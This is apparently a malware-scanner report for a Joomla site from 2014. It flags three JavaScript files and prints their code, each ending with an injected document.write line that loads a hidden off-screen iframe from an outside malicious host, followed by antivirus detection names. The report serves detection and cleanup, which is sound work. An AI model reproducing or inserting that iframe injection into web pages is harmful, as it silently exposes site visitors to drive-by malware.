New scan:

Malware Scanner report for paramore1.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://paramore1.ru/
200 OK
Content-Length: 57323
Content-Type: text/html
clean
http://paramore1.ru/static/js/analytics.js
200 OK
Content-Length: 558
Content-Type: text/html
clean
http://paramore1.ru/static/js/function.file-get-contents
200 OK
Content-Length: 572
Content-Type: text/html
clean
http://paramore1.ru/test404page.js
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/function.file-get-contents
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/components/com_jcomments/js/jcomments-v2.1.js_v=2.html
200 OK
Content-Length: 27019
Content-Type: text/html
clean
http://paramore1.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 4178
Content-Type: application/javascript
clean
http://paramore1.ru/media/system/js/caption.js
200 OK
Content-Length: 2350
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 826 bytes are skipped ...
t:"+align);
if (!docMode|| docMode < 8) {
container.style.width = width + "px";
}
}
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN

http://paramore1.ru/includes/js/overlib_mini.js
200 OK
Content-Length: 37030
Content-Type: application/javascript
clean
http://paramore1.ru/components/com_joomgallery/assets/js/joomscript.js
200 OK
Content-Length: 15387
Content-Type: application/javascript
clean
http://paramore1.ru/modules/mod_gk_tab/scripts/engine_compress.js
200 OK
Content-Length: 3186
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('19.C("16",5(){$6(".T").g(5(2,i){9 W=2.18("1d");9 $G=$1e["T"+W];9 3=$G["S"];9 b=2.1c(\'.Q-\'+3);9 1f=($G["13"]==0)?11:X;9 4=0;9 U=($G["1i"]==0)?"R":"1h";9 d=b.1g;9 f=X
... 2208 bytes are skipped ...
ab_container2|true|else|autoAnimation|gk_tab_button_prev|gk_tab_button_next|domready|Scroll|getProperty|window|duration|styleType|getElementsBySelector|id|Gavick|animation|length|mouseenter|activator|new|height|wait|transition|gk1_tab_ul|animationType|return|Fx|addClass'.split('|'),0,{}))
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

http://paramore1.ru/modules/mod_gk_tab/scripts/importer.php_modid=tabmix1_activator=click_animation=0_animationFun=Fx.Transitions.linear_animationType=1_animationSpeed=300_animationInterval=5000_styleType=0_styleSuffix=style1_fixedHeight=0_fixedHeightValue=200_alwaysHide=0.html
200 OK
Content-Length: 794
Content-Type: text/html
clean
http://paramore1.ru/modules/mod_gk_tab/scripts/function.file-get-contents
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/modules/mod_gk_image_show/js/style3/engine.js
200 OK
Content-Length: 5429
Content-Type: application/javascript
clean
http://paramore1.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js
200 OK
Content-Length: 4644
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

window.addEvent("load",function(){
$$('.gk_npro_mainwrap').each(function(el,i){
var TID = el.getProperty('id');
var main = $(TID);
var animation = false;
var $G = $Gavick[TID];
if($E('.gk_npro_full_interface', main) && $E('.gk_npro_full_scroll1', main)){
var offset = $E('.gk_npro_full_scroll1', main).getSize().size.x;
var scroller_main = new Fx.Scroll($E('.gk_npro_full_scroll1', main),{duration: $G['animation_speed'],wheelStops:false});
... 4094 bytes are skipped ...
actual_list_page == blocks_list.length - 1){
scroller_list.scrollTo(0, 0);
actual_list_page = 0;
}else{
actual_list_page++;
scroller_list.scrollTo(actual_list_page * offset_list, 0);
}
});
}
}
});
});;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: paramore1.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=paramore1.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paramore1.ru/

Result: paramore1.ru is not infected or malware details are not published yet.